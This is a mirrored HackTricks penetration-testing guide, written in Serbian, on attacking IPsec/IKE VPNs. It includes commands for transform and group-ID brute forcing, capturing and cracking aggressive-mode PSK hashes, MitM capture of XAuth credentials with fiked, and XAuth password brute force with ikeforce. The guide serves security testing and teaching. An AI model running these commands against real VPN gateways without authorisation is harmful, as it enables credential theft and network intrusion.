Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/ipsec-ike-vpn-pentesting.md

18 KiB
Raw Blame History

500/udp - Testiranje IPsec/IKE VPN

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Try Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}

Osnovne informacije

IPsec je široko prepoznat kao glavna tehnologija za obezbeđivanje komunikacije između mreža (LAN-to-LAN) i od udaljenih korisnika do mrežnog pristupnog čvora (udaljeni pristup), služeći kao osnova za rešenja preduzeća za VPN.

Uspostavljanje bezbednosne asocijacije (SA) između dve tačke upravlja IKE, koji funkcioniše pod okriljem ISAKMP, protokola dizajniranog za autentifikaciju i razmenu ključeva. Ovaj proces se odvija u nekoliko faza:

  • Faza 1: Bezbedan kanal se kreira između dve tačke. To se postiže korišćenjem Pre-Shared Key (PSK) ili sertifikata, koristeći ili glavni režim, koji uključuje tri para poruka, ili agresivni režim.
  • Faza 1.5: Iako nije obavezna, ova faza, poznata kao Faza Proširene Autentifikacije, proverava identitet korisnika koji pokušava da se poveže zahtevajući korisničko ime i lozinku.
  • Faza 2: Ova faza je posvećena pregovaranju parametara za obezbeđivanje podataka sa ESP i AH. To omogućava korišćenje algoritama različitih od onih u Fazi 1 kako bi se osigurala Savršena Napredna Tajnost (PFS), poboljšavajući bezbednost.

Podrazumevani port: 500/udp

Otkrijte uslugu korišćenjem nmap-a

root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT    STATE SERVICE
500/udp open  isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)

Pronalaženje validne transformacije

IPSec konfiguracija može biti podešena da prihvati samo jednu ili nekoliko transformacija. Transformacija je kombinacija vrednosti. Svaka transformacija sadrži broj atributa kao što su DES ili 3DES kao algoritam za enkripciju, SHA ili MD5 kao algoritam za integritet, prethodno deljeni ključ kao tip autentifikacije, Diffie-Hellman 1 ili 2 kao algoritam za distribuciju ključa i 28800 sekundi kao životni vek.

Prvo što morate uraditi je pronaći validnu transformaciju, tako da će server komunicirati sa vama. Za to možete koristiti alat ike-scan. Podrazumevano, Ike-scan radi u glavnom režimu i šalje paket ka pristupnoj tački sa ISAKMP zaglavljem i jednim predlogom sa osam transformacija unutar njega.

Na osnovu odgovora možete dobiti informacije o krajnjoj tački:

root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify

Kao što možete videti u prethodnom odgovoru, postoji polje nazvano AUTH sa vrednošću PSK. To znači da je VPN konfigurisan korišćenjem unapred podele ključa (i ovo je zaista dobro za pentestera).
Vrednost poslednje linije je takođe veoma važna:

  • 0 returned handshake; 0 returned notify: Ovo znači da meta nije IPsec gateway.
  • 1 returned handshake; 0 returned notify: Ovo znači da je meta konfigurisana za IPsec i spremna je da obavi IKE pregovore, i da je jedan ili više transformacija koje ste predložili prihvatljivo (važeća transformacija će biti prikazana u izlazu).
  • 0 returned handshake; 1 returned notify: VPN gateway-ovi odgovaraju sa obaveštenjem kada nijedna od transformacija nije prihvatljiva (mada neki gateway-ovi to ne rade, u tom slučaju treba pokušati sa daljom analizom i revidiranim predlogom).

Zatim, u ovom slučaju već imamo važeću transformaciju, ali ako se nalazite u 3. slučaju, tada morate malčice probati sa brute-force-om da biste pronašli važeću transformaciju:

Prvo morate kreirati sve moguće transformacije:

for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done

I onda svaki od njih probajte napasti brute-force metodom koristeći ike-scan (ovo može potrajati nekoliko minuta):

while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

Ako brute-force nije uspeo, možda server odgovara bez rukovanja čak i na validne transformacije. Zatim, možete pokušati isti brute-force ali koristeći agresivni režim:

while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt

Nadam se da će važeća transformacija biti vraćena.
Možete pokušati isti napad koristeći iker.py.
Takođe možete pokušati da grubo forsirate transformacije sa ikeforce:

./ikeforce.py <IP> # No parameters are required for scan -h for additional help

U DH grupi: 14 = 2048-bitni MODP i 15 = 3072-bitni
2 = HMAC-SHA = SHA1 (u ovom slučaju). Format --trans je $Enc,$Hash,$Auth,$DH

Cisco preporučuje izbegavanje korišćenja DH grupa 1 i 2 jer nisu dovoljno jake. Stručnjaci veruju da zemlje sa velikim resursima lako mogu probiti enkripciju podataka koji koriste ove slabe grupe. To se postiže korišćenjem posebnog metoda koji ih priprema da brzo probiju kodove. Iako košta puno novca postaviti ovaj metod, omogućava ovim moćnim zemljama da čitaju enkriptovane podatke u realnom vremenu ako koriste grupu koja nije jaka (kao što je 1,024-bitna ili manja).

Fingerprintiranje servera

Zatim, možete koristiti ike-scan da pokušate otkriti proizvođača uređaja. Alat šalje početni predlog i prestaje sa reprodukcijom. Zatim, analizira razliku u vremenu između primljenih poruka od servera i odgovarajućeg obrasca odgovora, pentester može uspešno identifikovati proizvođača VPN gateway-a. Takođe, neki VPN serveri će koristiti opcioni Vendor ID (VID) payload sa IKE.

Navedite validnu transformaciju ako je potrebno (koristeći --trans)

Ako IKE otkrije koji je proizvođač, isprintaće ga:

root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

IKE Backoff Patterns:

IP Address       No.  Recv time            Delta Time
172.16.21.200    1    1322286031.744904    0.000000
172.16.21.200    2    1322286039.745081    8.000177
172.16.21.200    3    1322286047.745989    8.000908
172.16.21.200    4    1322286055.746972    8.000983
172.16.21.200    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify

Ovo može biti postignuto i sa nmap skriptom ike-version

Pronalaženje tačnog ID-a (imenovanje grupe)

Da biste bili u mogućnosti da uhvatite heš, potreban vam je validan transform koji podržava Agresivni režim i tačan ID (ime grupe). Verovatno nećete znati validno ime grupe, pa ćete morati da ga probate silom. Da biste to uradili, preporučio bih vam 2 metode:

Silom probijanje ID-a sa ike-scan

Prvo pokušajte da napravite zahtev sa lažnim ID-om pokušavajući da prikupite heš ("-P"):

ike-scan -P -M -A -n fakeID <IP>

Ako nema povratne vrednosti heša, tada će verovatno ovaj metod brute force napada raditi. Ako se vrati neki heš, to znači da će se za lažni ID poslati lažni heš, pa ovaj metod neće biti pouzdan za brute-force napad na ID. Na primer, može se vratiti lažni heš (ovo se dešava u modernim verzijama):

Ali ako, kao što sam rekao, nema povratne vrednosti heša, tada biste trebali pokušati da brute-force napadnete zajednička imena grupa koristeći ike-scan.

Ovaj skript će pokušati da brute-force napadne moguće ID-ove i vratiće ID-ove gde je vraćen validan handshake (ovo će biti validno ime grupe).

Ako ste otkrili određenu transformaciju, dodajte je u ike-scan komandu. Ako ste otkrili više transformacija, slobodno dodajte novu petlju da ih sve isprobate (trebalo bi da ih isprobate sve dok jedna od njih pravilno funkcioniše).

Možete koristiti rečnik ikeforce ili onaj u seclists zajedničkih imena grupa za brute-force napade na njih:

while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt

Bruteforcing ID with Iker

iker.py takođe koristi ike-scan za pokušaj otkrivanja mogućih imena grupa. Prati svoju metodu za pronalaženje validnog ID-a na osnovu izlaza ike-scan-a.

Bruteforcing ID with ikeforce

ikeforce.py je alat koji se može koristiti za bruteforce ID-ova takođe. Ovaj alat će pokušati iskoristiti različite ranjivosti koje bi mogle biti korištene za razlikovanje između validnog i nevalidnog ID-a (može imati lažne pozitivne i lažne negativne rezultate, zbog čega preferiram korišćenje metode ike-scan-a ako je moguće).

Podrazumevano, ikeforce će na početku poslati neke nasumične ID-ove kako bi proverio ponašanje servera i odredio taktiku koju će koristiti.

  • Prva metoda je da brute-force-uje imena grupa tražeći informacije Dead Peer Detection DPD Cisco sistema (ove informacije server emituje samo ako je ime grupe tačno).
  • Druga dostupna metoda je da proveri broj poslatih odgovora za svaki pokušaj jer se ponekad šalje više paketa kada se koristi tačan ID.
  • Treća metoda sastoji se od traženja "INVALID-ID-INFORMATION" u odgovoru na neispravan ID.
  • Na kraju, ako server ne emituje ništa kao odgovor na provere, ikeforce će pokušati da brute-force-uje server i proveri da li server emituje neki paket kada se pošalje tačan ID.
    Očigledno je cilj brute force-ovanja ID-a da se dobije PSK kada imate validan ID. Zatim, sa ID-om i PSK-om moraćete da brute-force-ujete XAUTH (ako je omogućen).

Ako ste otkrili određenu transformaciju, dodajte je u ikeforce komandu. I ako ste otkrili više transformacija, slobodno dodajte novu petlju da ih sve isprobate (trebalo bi da ih isprobate sve dok jedna od njih pravilno funkcioniše).

git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library

./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic

Sniffing ID

(Iz knjige Procena bezbednosti mreže: Upoznajte svoju mrežu): Takođe je moguće dobiti validna korisnička imena špijuniranjem veze između VPN klijenta i servera, jer se prvi paket agresivnog moda koji sadrži ID klijenta šalje otvoreno

Snimanje i dešifrovanje heša

Na kraju, ako ste pronašli validnu transformaciju i ime grupe i ako je agresivni mod dozvoljen, tada možete veoma lako uhvatiti dešifrovan heš:

ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor

Hash će biti sačuvan unutar hash.txt.

Možete koristiti psk-crack, john (koristeći ikescan2john.py) i hashcat da provalite hash:

psk-crack -d <Wordlist_path> psk.txt

XAuth

Agresivni režim IKE u kombinaciji sa Pre-Shared Key (PSK) se često koristi u svrhu grupne autentikacije. Ovaj metod se proširuje sa XAuth (Extended Authentication), koji služi da uvede dodatni sloj autentikacije korisnika. Takva autentikacija obično koristi usluge poput Microsoft Active Directory, RADIUS, ili sličnih sistema.

Prelaskom na IKEv2, primećuje se značajna promena gde se koristi EAP (Extensible Authentication Protocol) umesto XAuth u svrhu autentikacije korisnika. Ova promena ističe evoluciju praksi autentikacije unutar sigurnih komunikacionih protokola.

MitM napad na lokalnu mrežu za hvatanje akreditiva

Tako da možete uhvatiti podatke o prijavi koristeći fiked i videti da li postoji neko podrazumevano korisničko ime (Morate preusmeriti IKE saobraćaj na fiked za špijuniranje, što se može uraditi uz pomoć ARP spoofinga, više informacija). Fiked će delovati kao VPN krajnja tačka i uhvatiće XAuth akreditive:

fiked -g <IP> -k testgroup:secretkey -l output.txt -d

Napad srednjeg čoveka (MitM) i blokiranje saobraćaja na portu 500 pomoću IPSec-a

Takođe, pokušajte da izvršite napad srednjeg čoveka (MitM) i blokirate sav saobraćaj ka portu 500 korišćenjem IPSec-a. Ako tunel IPSec-a ne može da se uspostavi, možda će se saobraćaj slati nešifrovan.

Brute-forcing XAUTH korisničko ime i lozinku pomoću ikeforce

Da biste primenili XAUTH metodu (kada znate validno ime grupe id i psk), možete koristiti korisničko ime ili listu korisničkih imena i listu lozinki:

./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]

Na ovaj način, ikeforce će pokušati da se poveže koristeći svaku kombinaciju korisničko ime: lozinka.

Ako pronađete jednu ili više validnih transformacija, jednostavno ih koristite kao u prethodnim koracima.

Autentikacija sa IPSEC VPN

U Kali-u, VPNC se koristi za uspostavljanje IPsec tunela. Profili se moraju nalaziti u direktorijumu /etc/vpnc/. Možete pokrenuti ove profile koristeći komandu vpnc.

Naredbe i konfiguracije u nastavku ilustruju proces postavljanja VPN veze pomoću VPNC-a:

root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0

U ovom postavci:

  • Zamijenite [VPN_GATEWAY_IP] stvarnom IP adresom VPN gateway-a.
  • Zamijenite [VPN_CONNECTION_ID] sa identifikatorom VPN veze.
  • Zamijenite [VPN_GROUP_SECRET] sa grupnim tajnim ključem VPN-a.
  • Zamijenite [VPN_USERNAME] i [VPN_PASSWORD] sa autentifikacionim podacima VPN-a.
  • [PID] simbolizuje ID procesa koji će biti dodeljen kada vpnc pokrene.

Uverite se da se koriste stvarne, sigurne vrednosti za zamenu oznaka prilikom konfigurisanja VPN-a.

Reference Materijal

Shodan

  • port:500 IKE

Try Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: